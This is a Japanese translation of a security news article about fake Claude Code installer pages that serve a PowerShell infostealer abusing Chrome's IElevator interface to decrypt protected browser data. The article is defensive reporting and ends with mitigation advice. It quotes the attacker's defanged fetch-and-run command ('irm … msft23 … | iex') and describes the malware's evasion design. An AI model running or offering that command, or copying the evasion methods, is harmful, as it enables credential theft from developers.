偽のClaude Codeがあなたのブラウザシークレットにアクセスするため、IElevatorを悪用

攻撃者は、Chrome の IElevator インターフェースを悪用して保護されたブラウザデータを盗む悪意のあるソフトウェアを展開するために、偽の Claude Code インストーラーを使用しています。

Anthropic の急速に人気が高まっている Claude Code ツールを探している開発者は、現在悪意のあるソフトウェアをダウンロードするように仕向けられています。

Ontinue の研究者によると、攻撃者は以前に文書化されていなかった PowerShell ペイロードを配信するために、偽の Claude Code インストーラーを悪用しています。このマルウェアは、検出を回避し、ブラウザ暗号化マテリアルを回復し、開発者システムから機密データを盗むように設計されています。

「開発者は、組織の最も機密性の高い資産(知的財産、クラウドインフラストラクチャ、CI/CD パイプライン)の鍵を持っています」と、Black Duck の AI リサーチエンジニアである Vineeta Sangaraju は述べました。「彼らはまた、必要に応じて、ソフトウェアをダウンロード、インストールする自由が必要です。この組み合わせにより、彼らは高価値のターゲットになります。」

Ontinue の研究者は、攻撃チェーン上で検出可能な可能性があるすべてが PowerShell ローダー内にラップされており、検出が複雑化していると述べました。「バイナリに対して評価した 2 つの標準 API チェーンルールセットは一致を返しませんでした」と、彼らはブログ投稿で述べています。

マルウェアには「地理的除外」が有効になっており、ホストの Windows リージョン設定を除外対象地域のリスト(具体的には、すべての CIS 加盟国とイラン)と照らし合わせてスキャンし、一致する場合は直ちに実行を中止します。

キャンペーンは Claude Code の正当な 1 行セットアップに置き換わります

Ontinue によると、キャンペーンは Claude Code 配布チャネルになりすまし偽のインストーラーページに依存しています。しかし、Anthropic の正当な 1 行インストール手順「irm https[:]//claude[.]ai/install.ps1 | iex」を配信するのではなく、ページは段階的なペイロードチェーンを開始する攻撃者が管理する PowerShell コマンド(「irm events[.]msft23[.]com | iex」)を提供します。

実行されると、悪意のあるルーチンは、一般的なマルウェアローダーに関連する動作インジケーターを最小化しながら、永続性を確立することを目的とした複数のコンポーネントをデプロイします。

「容易に検出されるすべてのもの、SQLite データベースアクセス、アーカイブ構築、HTTPS 流出、スケジュール済みタスク永続性、およびプロセスインジェクションチェーン自体は、PowerShell ローダー内のみに存在します」と研究者は述べ、ネイティブヘルパーはネットワーク、暗号化、またはファイル列挙インポートを公開していないと付け加えました。

唯一の兆候は、単一の間接的な COM vtable 呼び出しです、と彼らは指摘しました。

詮索好きな目から隠れながらマルウェアが実行できることのリストには、地理的除外、ID 収集、ブラウザ列挙、v10/v20 キー処理、PowerShell アーキテクチャマッチングと起動、復号化と収集、流出、および永続性が含まれます。

「正当なインストーラーを悪意のあるものと入れ替えることは、新しい攻撃ではない」と Sangaraju は指摘しました。「しかし、この継続的なキャンペーンが注目される理由は、ほとんどのセキュリティチームが今日依存している検出方法を回避するために構築された精度です。悪意のある活動は、意図的にスキャナーに対してベナインに見えるように構成されています。」

Chrome エレベーション サービスが暗号化を破るために悪用されました

研究者はまた、Application-Bound Encryption(ABE)保護に関連する暗号化マテリアルを回復するために Chrome エレベーション サービスを悪用するマルウェアについて書きました。ペイロードは Chrome 内の IElevator2 COM インターフェースを活用して、(ABE)暗号化キーを取得します。

この機能により、攻撃者は通常、情報盗取者がアクセスできないブラウザで保護されたデータにアクセスできました。Google は 2024 年 7 月に Chrome 127 で ABE を導入し、一般的な盗取者が SQLite データベースから Cookie と保存されたパスワードを取得するのを防ぐために設計されました。

Ontinue は、Lumma、StealC、Vidar、EDDIESTEALER、Katz、VoidStealer、Storm、XenoSteler など、一般的なファミリーに関連する公開 TTP と一致するものを見つけられなかったため、確実な帰属主張を控えました。研究者が見つけた最も近い一致は、IElevator も悪用する Glove Stealer でしたが、6 つの異なる側面を引用して、直接的な帰属主張を却下しました。

YARA ルールセットと侵害インジケーターのセット(IOC)は、GitHub リポジトリを通じて検出をサポートするために共有され、研究者は追加のベストプラクティスのセットを推奨しました。これらには、PowerShell 制約言語モードの実装、フィッシング耐性 MFA 認証の有効化、AMSI 改ざん保護の有効化と検証、新しく登録されたドメインのブロックが含まれました。

翻訳元: https://www.csoonline.com/article/4169992/fake-claude-code-takes-the-ielevator-to-your-browser-secrets.html

ソース: csoonline.com